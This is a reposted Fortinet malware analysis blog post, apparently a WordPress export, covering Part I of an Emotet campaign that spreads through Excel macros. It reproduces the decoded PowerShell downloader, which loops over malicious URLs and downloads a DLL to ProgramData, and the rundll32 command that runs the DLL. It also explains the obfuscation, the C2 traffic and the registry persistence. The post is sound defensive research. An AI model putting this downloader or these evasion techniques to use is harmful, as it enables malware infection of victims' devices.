{"id":18440,"date":"2022-03-07T10:40:03","date_gmt":"2022-03-07T18:40:03","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2022\/03\/07\/news-12173\/"},"modified":"2022-03-07T10:40:03","modified_gmt":"2022-03-07T18:40:03","slug":"news-12173","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/03\/07\/news-12173\/","title":{"rendered":"MS Office Files Involved Again in Recent Emotet Trojan Campaign \u2013 Part I"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b>Affected platforms:<\/b> Microsoft Windows<br \/> <b>Impacted parties: <\/b>64-bit Windows Users<br \/> <b>Impact: <\/b>Controls victim\u2019s device and collects sensitive information<br \/> <b>Severity level: <\/b>Critical <\/p>\n<p>Recently, Fortinet\u2019s FortiGuard Labs captured more than 500 Microsoft Excel files that were involved in a campaign to deliver a fresh Emotet Trojan onto the victim\u2019s device.<\/p>\n<p>Emotet, known as a modular Trojan, was first discovered in the middle of 2014. Since then, it has become very active, continually updating itself. It has also been highlighted in cybersecurity news from time to time. Emotet uses social engineering, like email, to lure recipients into opening attached document files (including Word, Excel, PDF, etc.) or clicking links within the content of the email that download Emotet\u2019s latest variant onto the victim\u2019s device and then execute it.<\/p>\n<p>Our FortiGuard Labs team has monitored Emotet Trojan campaigns in the past and posted numerous <a href=\"https:\/\/www.fortinet.com\/blog\/search?q=Emotet\">technical analysis blogs<\/a>.<\/p>\n<p>This time, I grabbed an Excel file from the captured samples and conducted deep research on this campaign. 
In Part I of my analysis, you can expect to learn: how an Excel file is leveraged to spread Emotet, what anti-analysis techniques Emotet uses in this variant, how it maintains persistence on a victim\u2019s device, how this Emotet variant communicates with its C2 server, and how other modules are delivered, loaded, and executed on a victim\u2019s system.<\/p>\n<h2><b>Looking into the Excel File<\/b><\/h2>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image.img.png\/1646637764539\/img1.png\" alt=\"Example of the Excel file opened in the MS Excel program\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1.1 \u2013 The Excel file is opened in the MS Excel program<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>I have set my Excel\u2019s macro option to &quot;Disable all macros with notification&quot; in &quot;Macro Settings.&quot; That\u2019s why it shows the yellow \u201cSecurity Warning\u201d bar when an opened Excel file contains a Macro, as shown in Figure 1.1. This image shows the fake message used to lure a victim into clicking the \u201cEnable Content\u201d button to view the protected content of the Excel file.<\/p>\n<p>The malicious Macro has a function called \u201cWorkbook_Open()\u201d that is executed automatically in the background when the Excel file opens. It calls other local functions to write data to two files: &quot;uidpjewl.bat&quot; and &quot;tjspowj.vbs&quot; in the \u201cC:\\ProgramData\u201d folder. The written data is read out from multiple cells of this Excel file. 
In the end, the Macro executes the &quot;tjspowj.vbs&quot; file with \u201cwscript.exe.\u201d Refer to Figure 1.2 for more information.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1333986966.img.png\/1646637804261\/img1.2.png\" alt=\"VBA code in Macro used to execute the extracted &#34;tjspowj.vbs&#34; file\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1.2 \u2013 VBA code in Macro used to execute the extracted &#34;tjspowj.vbs&#34; file<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2><b>VBS and PowerShell<\/b><\/h2>\n<p>The code in \u201ctjspowj.vbs\u201d is obfuscated. See Figure 2.1. 
The top part is the original code and the bottom part is the normalized code.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_771653274.img.png\/1646637835162\/img2.1.png\" alt=\" Figure 2.1 \u2013 VBS code in \u201ctjspowj.vbs\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 2.1 \u2013 VBS code in \u201ctjspowj.vbs\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--12 aem-GridColumn--offset--default--0\">\n<p>The code is very simple. It runs the early extracted \u201cuidpjewl.bat\u201d file, which downloads the Emotet payload file. \u201cuidpjewl.bat\u201d file is a DOS batch file containing the PowerShell code, which is encoded many times. 
To better understand its intention, I have decoded it below:<\/p>\n<p style=\"margin-left: 24.0px;\"><i><span style=\"background-color: rgb(217,217,217);\"><span style=\"color: black;\">$MJXdfshDrfGZses4=&quot;<\/span><span style=\"color: rgb(192,0,0);\">hxxps:\/\/youlanda[.]org\/eln-images\/n8DPZISf\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">hxxp:\/\/rosevideo[.]net\/eln-images\/EjdCoMlY8Gy\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">hxxp:\/\/vbaint[.]com\/eln-images\/H2pPGte8XzENC\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">hxxps:\/\/framemakers[.]us\/eln-images\/U5W2IGE9m8i9h9r\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">hxxp:\/\/niplaw[.]com\/asolidfoundation\/yCE9\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/robertmchilespe[.]com\/cgi\/3f\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/vocoptions[.]net\/cgi\/ifM9R5ylbVpM8hfR\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/missionnyc[.]org\/ fonts\/JO5\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/robertflood[.]us\/eln-images\/DGI2YOkSc99XPO\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/mpmcomputing[.]com\/fonts\/fJJrjqpIY3Bt3Q\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/dadsgetinthegame[.]com\/eln-images\/tAAUG\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/smbservices[.]net\/cgi\/JO01ckuwd\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: rgb(192,0,0);\">http:\/\/stkpointers[.]com\/eln-images\/D\/<\/span><span style=\"color: black;\">,<\/span><span style=\"color: 
rgb(192,0,0);\">hxxp:\/\/rosewoodcraft[.]com\/Merchant2\/5.00\/PGqX\/<\/span><span style=\"color: black;\">&quot;.sPLIt(&quot;,&quot;);<\/span><\/span><\/i><\/p>\n<p style=\"margin-left: 24.0px;\"><i><span style=\"background-color: rgb(217,217,217);\">foReACh($yIdsRhye34syufgxjcdf iN $MJXdfshDrfGZses4){<\/span><br \/>  <span style=\"background-color: rgb(217,217,217);\">$GweYH57sedswd=(&quot;<\/span><span style=\"color: rgb(231,76,60);\"><span style=\"background-color: rgb(217,217,217);\">c:\\programdata\\puihoud.dll&quot;<\/span><\/span><span style=\"background-color: rgb(217,217,217);\">);<\/span><br \/>  <span style=\"background-color: rgb(217,217,217);\">invoke-webrequest -uri $yIdsRhye34syufgxjcdf -outfile $GweYH57sedswd;<\/span><br \/>  <span style=\"background-color: rgb(217,217,217);\">iF(test-path $GweYH57sedswd) {<\/span><br \/>  <span style=\"background-color: rgb(217,217,217);\">if((get-item $GweYH57sedswd).length -ge 47436) { break; }<\/span><br \/>  <span style=\"background-color: rgb(217,217,217);\">}<\/span><br \/>  <span style=\"background-color: rgb(217,217,217);\">}<\/span><\/i><\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>It tries to download Emotet (into the local file &quot;c:\\programdata\\puihoud.dll&quot;, which is hardcoded in the PowerShell) from each website in the list in turn, and stops as soon as one download produces a file of at least 47436 bytes.<\/p>\n<p>Meanwhile, the caller \u201ctjspowj.vbs\u201d is responsible for running the downloaded Emotet with the command <span style=\"background-color: rgb(217,217,217);\">&quot;<\/span><i><span style=\"background-color: rgb(217,217,217);\">cmd \/c start \/B c:\\windows\\syswow64\\rundll32.exe c:\\programdata\\puihoud.dll,tjpleowdsyf<\/span><\/i><span style=\"background-color: rgb(217,217,217);\">&quot;<\/span>.<\/p>\n<p>\u201cC:\\Windows\\SysWOW64\u201d is a system folder created by Microsoft for storing 32-bit files. 
\u201cWOW64\u201d is the x86 emulator that allows 32-bit Windows applications to run on 64-bit Windows. It only exists on 64-bit Windows. In other words, although the downloaded Emotet file was compiled for 32-bit architecture, this variant only affects 64-bit Windows users. On 32-bit Windows it terminates and pops up an error message, because the file at that path is not found.<\/p>\n<p>\u201crundll32.exe\u201d is a system file that loads and runs 32-bit dynamic-link library (DLL) files. It uses the command line syntax \u201crundll32.exe DLLname,&lt;Export Function&gt;\u201d, where the \u201cExport Function\u201d is optional. \u201cpuihoud.dll\u201d is the DLL name for this Emotet, and the export function name that follows it (\u201ctjpleowdsyf\u201d) is a random string. In an analysis tool, I found it has only one export function, called \u201cDllRegisterServer()\u201d. Let\u2019s see what happens with a random export function.<\/p>\n<h2><b>Start Emotet in Rundll32<\/b><\/h2>\n<p>Once the Emotet file (\u201cpuihoud.dll\u201d) is loaded by \u201crundll32.exe\u201d, its entry point function is called first. It then calls the DllMain() function, which loads and decrypts a 32-bit Dll into memory from a \u201cResource\u201d named \u201cHITS\u201d. 
The decrypted Dll is the core of this Emotet, which will be referred to as \u201cX.dll\u201d in this analysis due to a hardcoded constant string in its code, as shown below.<\/p>\n<p style=\"margin-left: 40.0px;\"><span style=\"background-color: rgb(217,217,217);\">10024030 ; Export Ordinals Table for X.dll\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><\/p>\n<p style=\"margin-left: 40.0px;\"><span style=\"background-color: rgb(217,217,217);\">10024032 aX_dll\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 db\u00a0<\/span><span style=\"color: rgb(231,76,60);\"><b><span style=\"background-color: rgb(217,217,217);\">&#8216;X.dll&#8217;<\/span><\/b><\/span><span style=\"background-color: rgb(217,217,217);\">,0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><\/p>\n<p style=\"margin-left: 40.0px;\"><span style=\"background-color: rgb(217,217,217);\">10024038 aDllregisterser db &#8216;DllRegisterServer&#8217;,0<\/span><\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1566476672.img.png\/1646637870777\/img-3.1.png\" alt=\" Figure 3.1 \u2013 Decrypt function and the decrypted X.dll\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 3.1 \u2013 Decrypt function and the decrypted X.dll<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 3.1 shows the relevant functions used to decrypt and deploy the decrypted \u201cX.dll\u201d, which is in memory. 
The EntryPoint() function of \u201cX.dll\u201d is called after its deployment.<\/p>\n<p>\u201cX.dll\u201d checks whether the export function name from the command line parameter is \u201cDllRegisterServer\u201d. If not, it runs the command line again with \u201cDllRegisterServer\u201d in place of the random string, like &quot;C:\\Windows\\system32\\rundll32.exe c:\\programdata\\puihoud.dll,DllRegisterServer&quot; (see steps 1 and 2 in Figure 3.3). It then calls ExitProcess() to exit the first \u201crundll32.exe\u201d. Figure 3.2 shows it about to call the API CreateProcessW() to run the new command.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_504371653.img.png\/1646637901362\/mg3.2.png\" alt=\" Figure 3.2 \u2013 \u201cX.dll\u201d starts \u201cpuihoud.dll\u201d with \u201cDllRegisterServer\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 3.2 \u2013 \u201cX.dll\u201d starts \u201cpuihoud.dll\u201d with \u201cDllRegisterServer\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p class=\"cq-text-placeholder-ipe\" data-emptytext=\"Text\">\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" 
src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1349875080.img.png\/1646637928217\/img3.3.png\" alt=\" Figure 3.3 \u2013 Workflow of Emotet to reach its core code\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 3.3 \u2013 Workflow of Emotet to reach its core code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>When Emotet is running with the \u201cDllRegisterServer\u201d export function, it exits normally from X.dll\u2019s EntryPoint() as well as puihoud.dll\u2019s EntryPoint() (step 3 in Figure 3.3). Next, rundll32 calls the API GetProcAddress() to resolve the export function \u201cDllRegisterServer\u201d from \u201cpuihoud.dll\u201d and calls it. Finally, puihoud.dll!DllRegisterServer() calls X.dll!DllRegisterServer() (step 4 in Figure 3.3).<\/p>\n<p>This is the standard way rundll32.exe loads a DLL file and runs one of its export functions.<\/p>\n<p>X.dll!DllRegisterServer() is the real starting point of the malicious activity on the victim\u2019s device.<\/p>\n<h2><b>Anti-Analysis Techniques<\/b><\/h2>\n<p>To protect its code from being analyzed, Emotet uses anti-analysis techniques. In this section I will explain which of these techniques this variant uses.<\/p>\n<ul>\n<li><b>Code Flow is Obfuscated<\/b><\/li>\n<\/ul>\n<p style=\"margin-left: 40.0px;\">In most functions, it scrambles the code flow with lots of \u201cgoto\u201d statements. It has a local variable, which I call \u201cswitch_number\u201d, that holds a dynamically updated number controlling which code executes next.<\/p>\n<p style=\"margin-left: 40.0px;\">The logic is that the whole function body is enclosed in an infinite \u201cwhile\u201d loop, which decides which code branch to enter (via \u201cgoto\u201d) according to the value of \u201cswitch_number\u201d. 
\u201cswitch_number\u201d is updated each time it is used, and once a branch has finished its task, control goes back to the \u201cwhile\u201d statement to check \u201cswitch_number\u201d again.<\/p>\n<p style=\"margin-left: 40.0px;\">This technique causes real trouble for security researchers trying to understand a function\u2019s intention and trace its code. Figure 4.1 shows C pseudocode that reveals the obfuscated code flow.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1027523446.img.png\/1646637969637\/img4.1.png\" alt=\"Figure 4.1 \u2013 Pseudo code of obfuscated code flow\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.1 \u2013 Pseudo code of obfuscated code flow<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<ul>\n<li><b>Strings are Encrypted<\/b><\/li>\n<\/ul>\n<p style=\"margin-left: 40.0px;\">All constant strings are encrypted and are only decrypted just before being used. Constant strings are usually very useful hints for researchers to quickly locate the key parts of the malware.<\/p>\n<ul>\n<li><b>Constant Numbers are Obfuscated<\/b><\/li>\n<\/ul>\n<p style=\"margin-left: 40.0px;\">Normally, constant numbers are useful to researchers for guessing the code\u2019s purpose. Here is an example. 
The instruction \u201cmov [esp+2ACh+var_1A0], 2710h\u201d has been obfuscated into the three instructions below, which arrive at the same value: (387854h OR 0F1FDFF8Dh) XOR 0F1FDD8CDh = 2710h.<\/p>\n<p style=\"margin-left: 48.0px;\"><span style=\"font-size: 11.0pt;\"><span style=\"font-family: Calibri , sans-serif;\"><span style=\"font-size: 12.0pt;\"><span style=\"background-color: rgb(217,217,217);\"><span style=\"color: black;\">mov\u00a0\u00a0\u00a0\u00a0 [esp+2ACh+var_1A0], 387854h<\/span><\/span><\/span><\/span><\/span><\/p>\n<p style=\"margin-left: 48.0px;\"><span style=\"font-size: 11.0pt;\"><span style=\"font-family: Calibri , sans-serif;\"><span style=\"font-size: 12.0pt;\"><span style=\"background-color: rgb(217,217,217);\"><span style=\"color: black;\">or\u00a0\u00a0\u00a0\u00a0\u00a0 [esp+2ACh+var_1A0], 0F1FDFF8Dh<\/span><\/span><\/span><\/span><\/span><\/p>\n<p style=\"margin-left: 48.0px;\"><span style=\"font-size: 11.0pt;\"><span style=\"font-family: Calibri , sans-serif;\"><span style=\"font-size: 12.0pt;\"><span style=\"background-color: rgb(217,217,217);\"><span style=\"color: black;\">xor\u00a0\u00a0\u00a0\u00a0 [esp+2ACh+var_1A0], 0F1FDD8CDh<\/span><\/span><\/span><\/span><\/span><\/p>\n<ul>\n<li><b>All APIs are hidden<\/b><\/li>\n<\/ul>\n<p style=\"margin-left: 40.0px;\">The APIs are resolved from a hash of the API name together with a hash of the module name the function belongs to. Each time Emotet needs to call an API, it calls a local function that returns the API\u2019s address in the EAX register, and then calls it. 
Figure 4.2 is an example of calling API GetCommandLineW(), where 0xB03E1C69 is the hash code of module \u201ckernel32\u201d and 0x4543B55E is the hash code of \u201cGetCommandLineW\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_2140278771.img.png\/1646638002656\/img4.2.png\" alt=\" Figure 4.2 \u2013 Getting the API GetCommandLineW() and invoking it\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 4.2 \u2013 Getting the API GetCommandLineW() and invoking it<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2><b>Communicating with the C2 Server<\/b><\/h2>\n<p>Once Emotet finishes collecting the basic information from the victim\u2019s device, it calls the API BCryptEncrypt() to encrypt the data. 
Let\u2019s look at what the collected data contains, as shown in Figure 5.1.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1222524077.img.png\/1646638029053\/img5.1.png\" alt=\" Figure 5.1 \u2013 Collected basic data to encrypt\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 5.1 \u2013 Collected basic data to encrypt<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The 60H bytes of data in memory are the plaintext to be encrypted. Let me explain what most of it is.<\/p>\n<p><b>0x20<\/b>, at offset+4, is the size of the SHA-256 hash that follows, which occupies the bytes from offset+8 to offset+0x27 (A0 C9 \u2026 68 F8). That is a SHA-256 hash of all the data that follows it, starting at offset+28h.<\/p>\n<p><b>0x2C<\/b>, at offset+28h, is the size of the following data. The next <b>0x10<\/b> is the length of the victim\u2019s ID (\u201cBOBSXPC_9C09B592\u201d), which is a combination of the computer name and the system drive\u2019s volume serial number. To obtain this information, Emotet calls APIs like GetComputerName(), GetWindowsDirectoryW(), and GetVolumeInformationW().<\/p>\n<p>The following dword <b>0x29C220DD<\/b> is a hash of the Emotet Dll\u2019s full path. <b>0x13465AA<\/b> is a constant value defined in its code; it may be a malware ID of this Emotet. <b>0x2710<\/b> is another constant value, and I suppose it is a sort of version of this variant. 
<b>0x19E7D<\/b> encodes the victim\u2019s system information, including Windows version, architecture,\u00a0and so on. To get this information it calls the APIs RtlGetVersion() and GetNativeSystemInfo(). <b>0x01<\/b> at offset+50h is a value derived from the current process ID (rundll32.exe).<\/p>\n<p>The remaining data, starting at offset+58h, is meaningless padding (AB AB AB\u2026).<\/p>\n<p>The encrypted binary data is converted into a base64 string by calling the API CryptBinaryToStringW(). The base64 string is submitted to the C2 server as the \u201cCookie\u201d value in an HTTP GET request.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1403965020.img.png\/1646638059594\/img-5.2.png\" alt=\" Figure 5.2 \u2013 Sending encrypted data to C2 server\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 5.2 \u2013 Sending encrypted data to C2 server<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>In the example shown in Figure 5.2, as you may have noticed, the Cookie name and URL are randomized by Emotet to evade detection by security devices.<\/p>\n<p>In total, there are 49 C2 servers (IP address and port) hardcoded and encrypted within this variant. 
Please refer to the \u201cC2 Server List\u201d under the \u201cIOCs\u201d section for all the IP addresses and ports.<\/p>\n<p>The C2 server inspects the submitted data to determine the next steps, which include replying with Emotet modules and commands for further actions.<\/p>\n<p>The response data is encrypted binary data in the HTTP response body. In Figure 5.3, below, the marked box is an example of the data just after decryption.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_2100567127.img.png\/1646638087553\/img-5.3.png\" alt=\" Figure 5.3 \u2013 The decrypted C2 response data\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 5.3 \u2013 The decrypted C2 response data<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The decrypted data is 60H bytes long and contains both verification data and control data.<\/p>\n<p><b>0x40<\/b> at the beginning is the size of the verification data that follows, the signature (31 1B \u2026 3C 6D), which is a\u00a0signed hash of the control data. The received data must pass this verification; otherwise Emotet drops the packet. The control data runs from offset+54H to the end. <b>0x8<\/b> is the size of the data that follows. 
The control data in this packet consists of two dwords, both 0x00.<\/p>\n<p>The first 0x00 is a flag that can be 0, 1, or 8.<\/p>\n<p>If the flag is 8, Emotet uninstalls itself from the victim\u2019s device: it removes the auto-run item from the system registry, deletes the file(s) or folder(s) it created, and deletes the Emotet Dll file.<\/p>\n<p>If the flag is 0 and the second dword is not 0 (it should be the size of the module attached to this packet), it executes the module on the victim\u2019s device.<\/p>\n<p>If the flag is 1, it takes the same branch as flag 0. I\u2019ll explain this part in more detail in the next part of this analysis.<\/p>\n<h2><b>Relocation and Persistence<\/b><\/h2>\n<p>Once Emotet receives a valid response from the C2 server, it relocates the downloaded Emotet dll file from \u201cC:\\Windows\\ProgramData\\puihoud.dll\u201d (in my analysis environment) into the \u201c%LocalAppData%\u201d folder.\u00a0 Moreover, to remain on the victim\u2019s device, Emotet makes itself persistent by adding the relocated file to the auto-run group in the system registry, so that it runs at system startup. 
Figure 6.1 is a screenshot of the Registry Editor displaying the auto-run item in the system registry.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image_1967749716.img.png\/1646638117446\/img-6.1.png\" alt=\" Figure 6.1 \u2013 Added auto-run item in the system registry.\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 6.1 \u2013 Added auto-run item in the system registry.<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2><b>Conclusion<\/b><\/h2>\n<p>In this post we have walked through the malicious Macro within a captured Excel file, which downloads Emotet via two extracted files, &quot;uidpjewl.bat&quot; and &quot;tjspowj.vbs&quot;.<\/p>\n<p>We then went through how the downloaded Emotet Dll file is run in a rundll32.exe process as well as how it extracts the Emotet core X.dll from its \u201cResource\u201d.<\/p>\n<p>I also explained what kinds of anti-analysis techniques this Emotet uses to protect its code from being analyzed.<\/p>\n<p>And finally, I elaborated on what kind of data Emotet collects from the victim\u2019s system and how the binary data is encrypted and converted into base64 string and finally submitted to its C2 server via an HTTP packet.<\/p>\n<p>In the next part of this analysis, I will focus on those returned modules from Emotet\u2019s C2 server and how they are executed by Emotet, as well as what sensitive data they are able to steal from the victim\u2019s device.<\/p>\n<p>Please stay tuned.<\/p>\n<h2><b>Fortinet Protections<\/b><\/h2>\n<p>Fortinet customers are already 
protected from this malware by FortiGuard\u2019s Web Filtering, AntiVirus, FortiMail, FortiClient, FortiEDR, and CDR (content disarm and reconstruction) services, as follows:<\/p>\n<p>The malicious Macro inside the Excel sample can be disarmed by the FortiGuard CDR (content disarm and reconstruction) service.<\/p>\n<p>All relevant URLs have been rated as &quot;<b>Malicious Websites<\/b>&quot; by the FortiGuard Web Filtering service.<\/p>\n<p>The captured\u00a0Excel sample and the downloaded Emotet dll file are detected as &quot;<b>VBA\/Emotet.2826!tr.dldr<\/b> &quot; and &quot;<b> W32\/Emotet.B185!tr<\/b>&quot; and are blocked by the FortiGuard AntiVirus service.<b><\/b><\/p>\n<p>FortiEDR detects both the Excel file and Emotet dll file as malicious based on its behavior.<\/p>\n<p>In addition to these protections, we suggest that organizations have their end users also go through the\u00a0FREE\u00a0<a href=\"https:\/\/training.fortinet.com\/?utm_source=blog&amp;utm_campaign=nse-institute\">NSE training<\/a>:\u00a0<a href=\"https:\/\/training.fortinet.com\/local\/staticpage\/view.php?page=nse_1&amp;utm_source=blog&amp;utm_campaign=nse-1\">NSE 1 \u2013 Information Security Awareness<\/a>. 
It includes a module on Internet threats that is designed to help end users learn how to identify and protect themselves from phishing attacks.<\/p>\n<h2><b>IOCs<\/b><\/h2>\n<h4><b>URLs Involved in the Campaign:<\/b><\/h4>\n<h4><b>C2 Server List in this Variant: (49 in total)<\/b><\/h4>\n<h4><b>Sample SHA-256 Involved in the Campaign:<\/b><\/h4>\n<p>[puihoud.dll (the downloaded Emotet)]<\/p>\n<p>A7C6ABBC3241B6CFCFA27158E80BD50D3C9F1AE97E86481CCABD5B2337670690<\/p>\n<p><i>Learn more about Fortinet\u2019s <a 
